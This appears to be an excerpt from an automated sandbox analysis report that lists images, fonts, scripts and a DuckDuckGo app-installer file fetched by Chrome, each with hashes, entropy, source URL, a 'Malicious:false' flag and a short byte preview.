                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):2945
                                                                                                                                                            Entropy (8bit):7.85783941152515
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:48:OuZkeaf1LOhQGUjDevyYwtho4Tp+bzSOYlf94iDmCpQViu86e20rBi7:rkJ1LFGmDevIBpgWOYlf9VaCpQViJ6eW
                                                                                                                                                            MD5:5730A6187495225E119137863E2EF034
                                                                                                                                                            SHA1:451DE7F1B9A7095530690B2F64FB58F6370CE0AA
                                                                                                                                                            SHA-256:EF042B0682C1DEBB22D2BE14670312D765B052577E1EED9478B866C5FEBB6E6A
                                                                                                                                                            SHA-512:6E8BE881B0F5F1B04421A8A2A854483092A9FE2D8EE52168E5AD361DC3F50C860BB7548FF55DB18256AD140068FD9EF56C046145EF6CC47E1F29CA3B55F55391
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            Preview:.PNG........IHDR..............>a.....pHYs...%...%.IR$.....sRGB.........gAMA......a.....IDATx..]R.I..3...W.w.'V.<..=.....X...... N`q....'0.....X..a^..s..Z.k.3....E..6X......,.H$..D".H$..D".H$.}.:.m...m.X...@..ow..1....._.?.;~._........]..77.A:!...7..F..3~K....;......"....`vs.-....>/..h..8.?.......A.i......1.s.}7.........x...io..c.)|....*.-.....p..d...$d!.).=....h...2a!..(...`...0.S........8o..5.i.......Eo.....w.1...Y....Q..Ih1B0.....P......j.....7.....j..X.Y.{..G.....b.............N..s........?<T.-.1~z{...*.2...Y..{q.>.:.f....j.a`~.+.......1W....}....w._.....5.&.z..f....1._T...t.......+HX..r.4.?...^.@...&...;..x...Tt.D...,....G.(*.3..M...@...?..2(U...d..C. &...-..V.d...o...4.&.....S....!".S.Y\......u.......g/t.......@~..~.........FZ.$..%".....|....}W.<mn..-.E..8$....O....w;..9:@c..d8.'./.!.,.~..y..j.~...[...:.....o.:....."...$`..f>x....(f..v.o.7./.q........q..O..so.m~?.2...U.H....c.y~-6.*...1..J....=...0....X. B..d.W.So@..z..l.A.4..... ..
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:PNG image data, 865 x 1220, 8-bit colormap, non-interlaced
                                                                                                                                                            Category:downloaded
                                                                                                                                                            Size (bytes):105834
                                                                                                                                                            Entropy (8bit):7.970978172299477
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3072:afxetbIBkGMBobU2oJcdd8PhLaceeprf82:afxetdBkqcihLqMT
                                                                                                                                                            MD5:81C041E5DC29D7DC9D16CD7C8E725A24
                                                                                                                                                            SHA1:B9B5C6B0D5B46C991A2078073CA8DAAC88DFAA84
                                                                                                                                                            SHA-256:B8ED057550F8D1298E616296823662A6331DE234D77FD6A8DB5C421343D043CC
                                                                                                                                                            SHA-512:DD9281351CF76964CC63679C61FFA3C1E317593C832AB71D41C9489B7B658F0F5FB608F6C8BA5A32513FA1FCC9F2389DFBCBC3DA3D5EFD90139A8B1D69E4EF4A
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            URL:https://duckduckgo.com/static-assets/image/pages/home/devices/how-it-works/web-protection-ios-light.png
                                                                                                                                                            Preview:.PNG........IHDR...a................PLTE...###................................................kkk.............................................................y{.}~...""".{}....wy....xz.......tv................rt................>>>....os.......YYY...".......&....9i....uuu!..&..*..-..2".111.........7'#<+'....x..nr....ur.sodUR$..A0,+..3...pm..._PM.@8...D-%H63jYW..J2)...?'.2..KKK9#......XIFo^\M=:fffQ7/4.SSC@..moB...yw{jh....|ztdb.......}...<.........X>6.wsNy.cd.uv...........F%.....ii....]^...ooo.....aF?.WW.......................^^^......{??^..?.~l66.OP{.....gOI...|||......GH..R0 ......yr7e....P&%..xZSj..[7'.qiQQQ..}qRI.aZ.........i`............h@-....lm|L2...3].....z.rp.O^@.#^......ku...h.R.Z=........wu....k..P=Y#..\Pn.....~.wJ.].uMq...#......>..../...p.S.F..g....$tRNS.......!%m+@29n.".(.y.G9.WP.c.ssuq........IDATx.........................................................................`...9a...}..t.pf....@d.W..X.k..`.1..c.1..c.1.T./c..w.4..&Q.iC..'.
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (10874), with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):10874
                                                                                                                                                            Entropy (8bit):5.248844428576748
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:192:LsCn5FaZOYdr8+Z0+nInmGPDLCpAlZ/cWNsQDmxW8TVXg:AYsOY2+JnCPCmX198dg
                                                                                                                                                            MD5:6E0FCBE2C3A659497E9C6D2BD4754FAA
                                                                                                                                                            SHA1:BA2E41DA4A1BB1077DE1D8F6533CAC7994864C5C
                                                                                                                                                            SHA-256:1B0F1B75314E3A6EA51DF8AD0D3DB12670463FFEDEACCC336C5BAB025D424F82
                                                                                                                                                            SHA-512:02365DB3BC9038DA6D9E58ED7DCCEE6AB198B5E8BBAEF0FB15964B543A4C4D5DBFACFD2EDDC3C68C20B490557918BE068B9C268A2F7CE80FBC8A1ADFEDF9B66D
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[36926],{93275:function(e,t,n){"use strict";n.d(t,{Hk:function(){return k},KF:function(){return E},Qd:function(){return C},UQ:function(){return O},bB:function(){return S}});var r=n(67294),a=n(45558),o=n(94411),u=n(69695),i=n(40884),l=n(61331),d=n(24683),s=n(12837),c=n(28274),f=n(765);function p(){return p=Object.assign||function(e){for(var t=1;t<arguments.length;t++){var n=arguments[t];for(var r in n)Object.prototype.hasOwnProperty.call(n,r)&&(e[r]=n[r])}return e},p.apply(this,arguments)}function v(e,t){if(null==e)return{};var n,r,a={},o=Object.keys(e);for(r=0;r<o.length;r++)n=o[r],t.indexOf(n)>=0||(a[n]=e[n]);return a}var y,h=["as","children","defaultIndex","index","onChange","readOnly","collapsible","multiple"],b=["as","children","disabled","index"],m=["as","children","onClick","onKeyDown","onMouseDown","onPointerDown","tabIndex"],_=["as","children"],g=(0,c.nm)("AccordionDescendantContext"),x=(0,a.o)("AccordionContext",{}),w=(0,
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 1280x800, components 3
                                                                                                                                                            Category:downloaded
                                                                                                                                                            Size (bytes):699077
                                                                                                                                                            Entropy (8bit):7.924397603892795
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12288:ARsJgrwHzmbvNz/HDY5jS/JoSAvM1NZtlKwjuwmTNkr//xFWzW7r:AWIwHKtsPkf9nMTNSTwWX
                                                                                                                                                            MD5:C8DC24A612FB7F0310E9873E53DE1695
                                                                                                                                                            SHA1:FBB7A31EAD486FA366E33A104F05F4A360EEBDA7
                                                                                                                                                            SHA-256:CE5738F3C0127C42824353A710BCB68E1CF7BC11F891A383DAF6F897417D32E6
                                                                                                                                                            SHA-512:A84EA412604882E4CC8A1BFA881DC255FE9890C86B9480A5D09B16815BE69206638C04E34480AD156CE807A7367875D61C4E1F05D15388A9636440F46E561C72
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            URL:https://lh3.googleusercontent.com/gwvwew_KoIj3OsVAqLa2y4UkHSGJm_hp9BMkEAeb15HEyZHEmXTGVrCN4VB-mElofPRd8dlXSsFHbJPnYu2pbRr9Lg=s1280-w1280-h800
                                                                                                                                                            Preview:......JFIF.....H.H.....C....................................................................C....................................................................... .................................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..XW.z..8_...a.O...W....J#Y.1.....-K.......:...._..=......j_..[....~,.S..!.....Z).5.._.Q.....Jv..Hj.sZ).._.3kq...../.........F........6.X.U_.....Bs..#...q..?...C.v..q.........<...De....5W.D..4.?..i..D........i..E...?...j..$....?..?:i..e.......i..\.....>...K..!.D...[.......a.......U..a.g.....;X..?_..{P.blFX.........B~.iXn......;...5.?....<..L.O.Ml4......<..\.I.
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, progressive, precision 8, 1510x1138, components 3
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):161428
                                                                                                                                                            Entropy (8bit):7.873289631273076
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3072:2J545YTpdpktn6kKyXmHkp/Tta3oytz/ODS4tkVuD1:2E5YTpzkt4tc/ErZ0kVe1
                                                                                                                                                            MD5:03CC62175DC0500261B975CF191B6DAA
                                                                                                                                                            SHA1:E90079B76C1CF47680CE6F875AA0BF279E55CAD4
                                                                                                                                                            SHA-256:0923B4AADFBBEC62AEB9E8D96E649520154D77CB97BD0F5A6278334CE3EB707C
                                                                                                                                                            SHA-512:24C96B9F1D356D6415C8A5B146DF00A10261CD4F37D498C0B3AD7677A3C478B431AD2B8B28D6E1BE504C8E3F20C14EBC30E21C7B9482ADEB102AD958F9404249
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            Preview:......JFIF.....,.,......ICC_PROFILE.......lcms.0..mntrRGB XYZ .........../acspAPPL...................................-lcms................................................desc... ...@cprt...`...6wtpt........chad.......,rXYZ........bXYZ........gXYZ........rTRC....... gTRC....... bTRC....... chrm...4...$dmnd...X...$dmdd...|...$mluc............enUS...$.....G.I.M.P. .b.u.i.l.t.-.i.n. .s.R.G.Bmluc............enUS.........P.u.b.l.i.c. .D.o.m.a.i.n..XYZ ...............-sf32.......B.......%.......................nXYZ ......o...8.....XYZ ......$.........XYZ ......b.........para..........ff......Y.......[chrm..............T|..L.......&g...\mluc............enUS.........G.I.M.Pmluc............enUS.........s.R.G.B...C.....................................%...#... , #&')*)..-0-(0%()(...C...........(...((((((((((((((((((((((((((((((((((((((((((((((((((......r.....................................................................................P............................................@.2..@.-...-.
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:Web Open Font Format (Version 2), TrueType, length 52280, version 1.0
                                                                                                                                                            Category:downloaded
                                                                                                                                                            Size (bytes):52280
                                                                                                                                                            Entropy (8bit):7.995413196679271
                                                                                                                                                            Encrypted:true
                                                                                                                                                            SSDEEP:1536:1rvqtK8DZilXxwJ8mMwAZy7phqsFLdG3B4d:xytBZits8bw4wzbFxG3B4d
                                                                                                                                                            MD5:F61F0D4D0F968D5BBA39A84C76277E1A
                                                                                                                                                            SHA1:AA3693EA140ECA418B4B2A30F6A68F6F43B4BEB2
                                                                                                                                                            SHA-256:57147F08949ABABE7DEEF611435AE418475A693E3823769A25C2A39B6EAD9CCC
                                                                                                                                                            SHA-512:6C3BD90F709BCF9151C9ED9FFEA55C4F6883E7FDA2A4E26BF018C83FE1CFBE4F4AA0DB080D6D024070D53B2257472C399C8AC44EEFD38B9445640EFA85D5C487
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            URL:https://fonts.gstatic.com/s/googlesans/v58/4UaRrENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iq2vgCI.woff2
                                                                                                                                                            Preview:wOF2.......8.....................................^...$..4?HVAR..?MVAR9.`?STAT.*',..J/.......`..(..Z.0..R.6.$.... .....K..[..q..c..T.....>.P.j.`.w..#...%......N.".....$..3.0.6......... .L.rX/r[j.y.|*(.4.%#.....2.v.m..-..%.....;-.Y.{..&..O=#l@...k..7g..ZI...#.Z./+T..r7...M..3).Z%.x....s..sL..[A!.5*1w'/.8V..2Z..%.X.h.o.).]..9..Q`.$.....7..kZ.~O........d..g.n.d.Rw+&....Cz..uy#..fz,(.J....v.%..`..9.....h...?O..:...c%.....6s....xl..#...5..._......1.>.)"U.4 W....?%......6//!$...!.n9C@n...........!""^.....W..Z<.7.x.."UT.T....E.."R>.R..t.....H d..e_.K../.+8.Q.P.ZQ....;...U....]......._.e*......71.?.7.ORv.?...l...G|.P...|:...I.X..2.,.L........d.g.]}W#uW]QnuP-s.;.-Y.....].......C..j_.M0...y.......J..........NY..@A...,....-.F......'..w./j5g.vUS...U..0.&...y7.LP.....%.....Y......Y..D. e.A..G.?.$.......6...eaK.n5.m...N...,...+BCl..L> .E9~.b[.w.x....6<...}.e...%V....O.......*.?...a..#[eE.4..p..$...].....%......o._......N.._~..El....b..A.0.r8.....|..D.d..
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (693)
                                                                                                                                                            Category:downloaded
                                                                                                                                                            Size (bytes):30985
                                                                                                                                                            Entropy (8bit):5.565858349544132
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:768:YbPp8P8ZSxg8n53/9evRcsCGZLC2q7V6j/pXG86w3:kHY/n53/qdtqphL+
                                                                                                                                                            MD5:1B9BBAEEB746934908D71E1CB49D2C43
                                                                                                                                                            SHA1:D5EFEF7E8707E7854E82384333B3B465E9CB58AF
                                                                                                                                                            SHA-256:D702A2B6EF9609323E4B152C44EF7ED502408E5DB5DA2BBE5C80F46D61D0F72B
                                                                                                                                                            SHA-512:67D874D0F710AFEBAA270583E9A209F11336A1D784BC416C7D11BC5ECB61239A1875CBC6A2F8530DE8345EEE8B642AB1864D8A27C1AC6283F210816C82E6A4C5
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            URL:"https://www.gstatic.com/_/mss/boq-chrome-webstore/_/js/k=boq-chrome-webstore.ChromeWebStoreConsumerFeUi.en_US.yIPKtUt8CNQ.es5.O/ck=boq-chrome-webstore.ChromeWebStoreConsumerFeUi.GtGb1vgdaaY.L.B1.O/am=SAcGA2YB/d=1/exm=A1yn5d,A7fCU,AWpPDd,BBI74,BVgquf,CfLNpd,DNlSjf,ECBKud,EEDORb,EFQ78c,FdMhB,Fu7Bjd,HsQQib,IZT63,JNoxi,KUM7Z,KfQkxf,L1AAkb,LBaJxb,LEikZe,LcrBLd,M0x0ie,MH0hJe,MI6k7c,MT4Hub,MdUzUe,Mlhmy,MpJwZc,NwH0H,O1Gjze,O626Fe,O6y8ed,OTA3Ae,OhgRI,OmgaI,P6sQOc,PIVayb,PrPYRd,QIhFr,QVysJe,QvLWAb,R6rk4,RMhBfe,RiINWe,RqjULd,SdcwHb,SpsfSb,UUJqVe,Uas9Hd,Ug7Xab,UkbOSe,Ulmmrd,V3dDOb,V9amgb,VBl5Ff,XVMNvd,Xi0ENb,YA1iG,YYmHzb,Z5uLle,ZDZcre,ZfAoz,ZvHseb,ZwDk9d,_b,_tp,aW3pY,aurFic,bZ0mod,byfTOb,cephkf,dsBBae,duFQFc,e5qFLc,ebZ3mb,fKUV3e,gIl2M,gychg,h4ilFc,hKSk3e,hc6Ubd,i8oNZb,kBpGk,kWgXee,kjKdXe,lazG7b,lsjVmc,lwddkf,mI3LFb,mUxuKd,mdR7q,n73qwf,o2G9me,ovKuLd,p8L0ob,pjICDe,pw70Gc,qv5bsb,ri2s0b,rm99Nc,s39S4,sI9bWe,sQ8PT,tw4SJc,w9C4d,w9hDv,ws9Tlc,xQtZb,xUdipf,yDVVkb,zKiH5d,zbML3c,zr1jrb/excm=_b,_tp,itemdetailview/ed=1/wt=2/ujg=1/rs=AEP720Jfe38t-OWhOSrlVq2pOwWCRGJ40A/ee=EVNhjf:pw70Gc;EmZ2Bf:zr1jrb;JsbNhc:Xd8iUd;K5nYTd:ZDZcre;LBgRLc:SdcwHb;Me32dd:MEeYgc;NPKaK:SdcwHb;NSEoX:lazG7b;Pjplud:EEDORb;QGR0gd:Mlhmy;SNUn3:ZwDk9d;ScI3Yc:e7Hzgb;Uvc8o:VDovNc;YIZmRd:A1yn5d;a56pNe:JEfCwb;cEt90b:ws9Tlc;dIoSBb:SpsfSb;dowIGb:ebZ3mb;eBAeSb:zbML3c;iFQyKf:QIhFr;lOO0Vd:OTA3Ae;nAFL3:s39S4;oGtAuc:sOXFj;pXdRYb:MdUzUe;qafBPd:yDVVkb;qddgKe:xQtZb;wR5FRb:YA1iG;xqZiqf:BBI74;yEQyxe:p8L0ob;yxTchf:KUM7Z;zxnPse:duFQFc/m=sOXFj,q0xTif,Qy2cOb"
                                                                                                                                                            Preview:"use strict";this.default_ChromeWebStoreConsumerFeUi=this.default_ChromeWebStoreConsumerFeUi||{};(function(_){var window=this;.try{._.ji(_.Fu);._.p("sOXFj");.var PA=function(a){_.L.call(this,a.Ha)};_.F(PA,_.L);PA.Ea=_.L.Ea;PA.prototype.j=function(a){return a()};_.KA(_.Eu,PA);._.q();._.p("oGtAuc");._.oga=new _.Tf(_.Fu);._.q();._.lC=function(a){_.$r.call(this,a.Ha);this.soy=this.dom=null;if(this.Rf()){var b=_.Ho(this.Nd(),[_.Dp,_.Cp]);b=_.ih([b[_.Dp],b[_.Cp]]).then(function(c){this.soy=c[0];this.dom=c[1]},null,this);_.bs(this,b)}this.Ba=a.qg.sS};_.F(_.lC,_.$r);_.lC.Ea=function(){return{qg:{sS:function(a){return _.rf(a)}}}};_.lC.prototype.Uh=function(a){return this.Ba.Uh(a)};_.lC.prototype.getData=function(a){return this.Ba.getData(a)};_.lC.prototype.Vv=function(){};_.mC=function(a,b){a&&_.Vf.hb().register(a,b)};._.p("q0xTif");.var Hga=function(a){var b=function(d){_.ss(d)&&(_.ss(d).Jb=null,_.MB(d,null));d.XyHi9&&(d.XyHi9=null)};b(a);a=a.querySelectorAll("[c-wiz]");for(var c=0;c<a.length;
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 48x48, components 3
                                                                                                                                                            Category:downloaded
                                                                                                                                                            Size (bytes):1499
                                                                                                                                                            Entropy (8bit):7.630145053214705
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:wTSRf/UFStfRxomm3oHkBNK+yelde0/LemhKt7CMkrldXDKjbFP8Mf7TpA:j8FSxRxDm3WkXK+Do0/LDhSyldXejbtQ
                                                                                                                                                            MD5:29C9FD88E6B536A459CFCDA95DF2A80A
                                                                                                                                                            SHA1:4598A1D34E74D4CA9A17626C0ABFB71B8CE3A4CD
                                                                                                                                                            SHA-256:829C7A8CD7BB6901E89ADBE972641F4CE724F31F3ED328BA0C8684BBFD0035F3
                                                                                                                                                            SHA-512:03C26837849959DD427DE3C30A09B14EDC6EB6A46E23C49C6D2D199B741E2BD9E000355A37CFCF7A859267AE21A6F72EB78C6E21D46735A34E6D81D7E153C14A
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            URL:https://lh3.googleusercontent.com/a-/ALV-UjWuDGySyWhbyLJdWT_0QCizAbEyFKjQ4lS3MMUOnV1yYX0ks1be=s48-w48-h48
                                                                                                                                                            Preview:......JFIF......................................................................................................................................................0.0.........................................3..........................!1.."AQa..q..$2#B.....................................,......................!1.AQ...".q.....2Ra.............?.....?..b@| B..H.....It3....J.+b.|....*.D...0..k.c.z3@i~..T..V..j$nIz(.....<..+C.kT2K...!.Kd...t?........U.Q..V...-..pr.x.......r.9...6...~[N..U.B...R.J.@E..+0..0..\.".H.m.KZ.<...Q$.*.i).".4.f?..p.....*j=S./q..e?...o.^.......2.A-.1....,........|.LN*.n.M...KS...4.MMS:@LQ..cm......D.B.{....s.y%.U@@#p...x^..y..\.h/.m.3<.Y.UK,s@......G..q......o.d..H..Z..t./.(...K$t.oM.{.<!wr..t.....w]...uk.......4.F..DN....#Y..<C......c|.m*...-bo...I ..:zz....;.-. .'.{.b....'..J...S9...1J.2..\.w`.v........_..K./.Q[.>.QU.6.A.@..m..l....>e.......PG....'#..A........y4.QY...Z..U......].#.......q....7w.V(rY.....X..H..b....Ed.s.L.E.J.
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (512)
                                                                                                                                                            Category:downloaded
                                                                                                                                                            Size (bytes):3421
                                                                                                                                                            Entropy (8bit):5.504805544229157
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:96:0+vVK9I3jyTYf6/N32tvxXE2Oz5TDOcv5cn:3KnNOKNzZDs
                                                                                                                                                            MD5:631DAC0DDB374A1ED7942B70CD165EC4
                                                                                                                                                            SHA1:B41725FBBC2A6901A2418A7EF7C15E12E60A47D7
                                                                                                                                                            SHA-256:846ECCF2DADA7A2E80CEFFAAB1FD57D67C1802FA4C2021413F8BC34F5EBE0F21
                                                                                                                                                            SHA-512:3A2511032630BE47437E7C5E62AB25096F6CE14281ED9929CC28149A5E85A52C32262FBC02408F4860C32CA0B5E44F2A13629E3B63C41AAE6FC4F4AA69939885
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            URL:"https://www.gstatic.com/_/mss/boq-chrome-webstore/_/js/k=boq-chrome-webstore.ChromeWebStoreConsumerFeUi.en_US.yIPKtUt8CNQ.es5.O/ck=boq-chrome-webstore.ChromeWebStoreConsumerFeUi.GtGb1vgdaaY.L.B1.O/am=SAcGA2YB/d=1/exm=A1yn5d,A7fCU,AWpPDd,BBI74,BVgquf,CfLNpd,DNlSjf,ECBKud,EEDORb,EFQ78c,FdMhB,Fu7Bjd,HsQQib,IZT63,JNoxi,KUM7Z,KfQkxf,L1AAkb,LBaJxb,LEikZe,LcrBLd,M0x0ie,MH0hJe,MI6k7c,MT4Hub,MdUzUe,Mlhmy,MpJwZc,NwH0H,O1Gjze,O626Fe,O6y8ed,OTA3Ae,OhgRI,OmgaI,P6sQOc,PIVayb,PrPYRd,QIhFr,QVysJe,QvLWAb,Qy2cOb,R6rk4,RMhBfe,RiINWe,RqjULd,SdcwHb,SpsfSb,UUJqVe,Uas9Hd,Ug7Xab,UkbOSe,Ulmmrd,V3dDOb,V9amgb,VBl5Ff,XVMNvd,Xi0ENb,YA1iG,YYmHzb,Z5uLle,ZDZcre,ZfAoz,ZvHseb,ZwDk9d,_b,_tp,aW3pY,aurFic,bZ0mod,byfTOb,cephkf,db7dHd,dsBBae,duFQFc,e5qFLc,ebZ3mb,fKUV3e,gIl2M,gychg,h4ilFc,hKSk3e,hc6Ubd,i8oNZb,kBpGk,kWgXee,kjKdXe,lazG7b,ld80Uc,lsjVmc,lwddkf,mI3LFb,mUxuKd,mdR7q,n73qwf,o2G9me,ovKuLd,p8L0ob,pjICDe,pw70Gc,q0xTif,qv5bsb,ri2s0b,rm99Nc,s39S4,sI9bWe,sOXFj,sQ8PT,tw4SJc,w9C4d,w9hDv,ws9Tlc,xQtZb,xUdipf,yDVVkb,zKiH5d,zbML3c,zr1jrb/excm=_b,_tp,itemdetailview/ed=1/wt=2/ujg=1/rs=AEP720Jfe38t-OWhOSrlVq2pOwWCRGJ40A/ee=EVNhjf:pw70Gc;EmZ2Bf:zr1jrb;JsbNhc:Xd8iUd;K5nYTd:ZDZcre;LBgRLc:SdcwHb;Me32dd:MEeYgc;NPKaK:SdcwHb;NSEoX:lazG7b;Pjplud:EEDORb;QGR0gd:Mlhmy;SNUn3:ZwDk9d;ScI3Yc:e7Hzgb;Uvc8o:VDovNc;YIZmRd:A1yn5d;a56pNe:JEfCwb;cEt90b:ws9Tlc;dIoSBb:SpsfSb;dowIGb:ebZ3mb;eBAeSb:zbML3c;iFQyKf:QIhFr;lOO0Vd:OTA3Ae;nAFL3:s39S4;oGtAuc:sOXFj;pXdRYb:MdUzUe;qafBPd:yDVVkb;qddgKe:xQtZb;wR5FRb:YA1iG;xqZiqf:BBI74;yEQyxe:p8L0ob;yxTchf:KUM7Z;zxnPse:duFQFc/m=Wt6vjf,hhhU8,FCpbqb,WhJNk"
                                                                                                                                                            Preview:"use strict";this.default_ChromeWebStoreConsumerFeUi=this.default_ChromeWebStoreConsumerFeUi||{};(function(_){var window=this;.try{._.p("Wt6vjf");.var mA=function(a){this.Ia=_.z(a,0,mA.messageId)};_.F(mA,_.C);mA.prototype.kb=function(){return _.Cl(this,1)};mA.prototype.yc=function(a){_.Ol(this,1,a)};mA.messageId="f.bo";var nA=function(){_.jp.call(this)};_.F(nA,_.jp);nA.prototype.hc=function(){this.dA=!1;oA(this);_.jp.prototype.hc.call(this)};nA.prototype.j=function(){pA(this);if(this.aq)return qA(this),!1;if(!this.NB)return rA(this),!0;this.dispatchEvent("p");if(!this.jx)return rA(this),!0;this.Jv?(this.dispatchEvent("r"),rA(this)):qA(this);return!1};.var sA=function(a){var b=new _.Wu(a.rJ);a.jy!=null&&b.j.set("authuser",a.jy);return b},qA=function(a){a.aq=!0;var b=sA(a),c="rt=r&f_uid="+encodeURIComponent(String(a.jx));_.Er(b,(0,_.Bh)(a.o,a),"POST",c)};.nA.prototype.o=function(a){a=a.target;pA(this);if(_.Lr(a)){this.vu=0;if(this.Jv)this.aq=!1,this.dispatchEvent("r");else if(this.NB)thi
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
                                                                                                                                                            Category:downloaded
                                                                                                                                                            Size (bytes):13229
                                                                                                                                                            Entropy (8bit):7.968329338879
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:192:jt/yLNZOkl66GdJPtvWHRw+97q3pVd+vajTctV5AxEKyWf62UjS0j6eOerReT:BKZGVRtvKqZVHPeXIH/0HOP
                                                                                                                                                            MD5:EC00DFDEAD7B4EBAEDFE9899EA5905D1
                                                                                                                                                            SHA1:FF6B6C17A52B89578FE16E4AFF4989A4FDA860D3
                                                                                                                                                            SHA-256:3123DE188014A841F794FCE944662C3C1DD4D71CCCBC72459E2B9148933B0DAC
                                                                                                                                                            SHA-512:68FFD7E34777612FA6B2E9B4F9E78EAC28A8F5996DA34B87663AED92A767718A1EA9892A55242C8797BF125A10A648CD68D3447D219E1DE1834EB71C95416816
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            URL:https://duckduckgo.com/_next/static/media/firefox-lg.8efad702.png
                                                                                                                                                            Preview:.PNG........IHDR..............>a.....pHYs...%...%.IR$.....sRGB.........gAMA......a...3BIDATx..}..^.U..}...#..e....V..O.....1YBp.DN`..*,....[.a...-..,..Z.. .... !....y..I.I*...8~.K#[.cY.F.....{...~....%...2........>..X.UY.UY.UY.UY.UY.UY..F..*.-.l...r.*uF..d7.C.X...sn...V...;...Le...!.....`..>2bN.c...4.*..9M..Z.Q..x0l....2.U..PH.#P.A(5..T..o.b....}7.3Y..;.V.....R4...?..&...ON.2.U.x...'?.....6..o.P....d...#....{.|.p.Z<"#...0...N\&.....Y.....*d`HE....s.m#..d..K.9};5...^.j...4.\..`..uy... ...g.M....v.....@...Af..Gm..=X......G.F.....F....V*W0j@H.!...C]...Be...eM..R\l..~=....i..r..^....V. ..(s...-...&.tZe..,..2f..L....&..d..R).l~..7.r..aj.....-..=..+PV..b........T.+..@..'.......{l7O.u.V.....s.....[x#lC..~[......5.P.{.QW}f.V..2..y..v.l..x.S.|.........;..._`.@.g.|.v..yY.`....2..".}gP..)..);....C (.P... (..\.(V.... ....x.~....;.. ....m.~..U."..n....p...c.Y....(SXU.WB..%...od..s.....#..V.......|.....`T5v...+..H.(........#.......W....J.V..........4..k...K@
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                            Category:downloaded
                                                                                                                                                            Size (bytes):768
                                                                                                                                                            Entropy (8bit):5.600886389690732
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:MMHddXOtPItOX9slNQXc44+Do9XbeSqxWPh/JpMZrYDU5dBmwBeC8eckJsooTsnZ:JdVOO+G+c44+cbNh/sVYDk8dkJsouk64
                                                                                                                                                            MD5:D0351CBCCE42015CD1627F7E8CD10B9C
                                                                                                                                                            SHA1:E43B9B51B2417BA2CFC44D9D1915037C5226A3E7
                                                                                                                                                            SHA-256:EB8F25250DC1D190B9FB345904358A624B9F213F1CA1FB1476CC6D520332B357
                                                                                                                                                            SHA-512:9D357E9CF0A2C9F43B620AD19BD78556344D6D198BE4FB7839A43FD18C9078349ED30D3CE4DF7B2D23412B4C9C6ED847F725F926512A6C4AEB8D0B7AB1A4940F
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            URL:https://staticcdn.duckduckgo.com/windows-desktop-browser/installer/funnel_home___details/DuckDuckGo.appinstaller
